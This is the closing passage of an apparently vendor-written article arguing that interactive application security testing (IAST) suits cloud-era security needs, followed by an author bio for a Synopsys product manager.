And we can’t forget implications relating to increasing cloud popularity. With the growing adoption of cloud, more and more sensitive data is being stored out of network perimeters. This increases the risk as well as the attack surface. Also increasing are the regulatory pressures and the need to deliver more with fewer resources in the shortest time possible. Under these circumstances, IAST is the most optimal way to test for application security, sensitive data leakage, and prevent breaches.

About the author: Asma Zubair is the Sr. Manager, IAST Product Management at Synopsys. As a seasoned security product management leader, she has also led teams at WhiteHat Security, The Find (Facebook) and Yahoo!

Copyright 2010 Respective Author at Infosec Island